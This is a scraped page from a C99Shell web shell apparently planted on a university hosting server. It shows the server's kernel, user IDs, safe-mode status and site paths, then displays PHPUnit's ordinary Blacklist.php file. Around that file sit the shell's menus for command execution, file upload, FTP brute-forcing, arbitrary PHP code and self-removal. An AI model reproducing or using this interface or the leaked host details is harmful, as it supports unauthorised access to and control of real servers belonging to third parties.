!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/home/h33678/data/www/it-man.ztu.edu.ua/src/vendor/phpunit/phpunit/src/Util/   drwxr-xr-x
Free 116.96 GB of 200.55 GB (58.32%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Blacklist.php (3.46 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * This file is part of PHPUnit.
 *
 * (c) Sebastian Bergmann <sebastian@phpunit.de>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

/**
 * Utility class for blacklisting PHPUnit's own source code files.
 *
 * @since Class available since Release 4.0.0
 */
class PHPUnit_Util_Blacklist
{
    
/**
     * @var array
     */
    
public static $blacklistedClassNames = array(
        
'File_Iterator'                              => 1,
        
'PHP_CodeCoverage'                           => 1,
        
'PHP_Invoker'                                => 1,
        
'PHP_Timer'                                  => 1,
        
'PHP_Token'                                  => 1,
        
'PHPUnit_Framework_TestCase'                 => 2,
        
'PHPUnit_Extensions_Database_TestCase'       => 2,
        
'PHPUnit_Framework_MockObject_Generator'     => 2,
        
'PHPUnit_Extensions_SeleniumTestCase'        => 2,
        
'Text_Template'                              => 1,
        
'Symfony\Component\Yaml\Yaml'                => 1,
        
'SebastianBergmann\Diff\Diff'                => 1,
        
'SebastianBergmann\Environment\Runtime'      => 1,
        
'SebastianBergmann\Comparator\Comparator'    => 1,
        
'SebastianBergmann\Exporter\Exporter'        => 1,
        
'SebastianBergmann\GlobalState\Snapshot'     => 1,
        
'SebastianBergmann\RecursionContext\Context' => 1,
        
'SebastianBergmann\Version'                  => 1,
        
'Composer\Autoload\ClassLoader'              => 1,
        
'Doctrine\Instantiator\Instantiator'         => 1,
        
'phpDocumentor\Reflection\DocBlock'          => 1,
        
'Prophecy\Prophet'                           => 1
    
);

    
/**
     * @var array
     */
    
private static $directories;

    
/**
     * @return array
     *
     * @since  Method available since Release 4.1.0
     */
    
public function getBlacklistedDirectories()
    {
        
$this->initialize();

        return 
self::$directories;
    }

    
/**
     * @param string $file
     *
     * @return bool
     */
    
public function isBlacklisted($file)
    {
        if (
defined('PHPUNIT_TESTSUITE')) {
            return 
false;
        }

        
$this->initialize();

        foreach (
self::$directories as $directory) {
            if (
strpos($file$directory) === 0) {
                return 
true;
            }
        }

        return 
false;
    }

    private function 
initialize()
    {
        if (
self::$directories === null) {
            
self::$directories = array();

            foreach (
self::$blacklistedClassNames as $className => $parent) {
                if (!
class_exists($className)) {
                    continue;
                }

                
$reflector = new ReflectionClass($className);
                
$directory $reflector->getFileName();

                for (
$i 0$i $parent$i++) {
                    
$directory dirname($directory);
                }

                
self::$directories[] = $directory;
            }

            
// Hide process isolation workaround on Windows.
            // @see PHPUnit_Util_PHP::factory()
            // @see PHPUnit_Util_PHP_Windows::process()
            
if (DIRECTORY_SEPARATOR === '\\') {
                
// tempnam() prefix is limited to first 3 chars.
                // @see http://php.net/manual/en/function.tempnam.php
                
self::$directories[] = sys_get_temp_dir() . '\\PHP';
            }
        }
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0374 ]--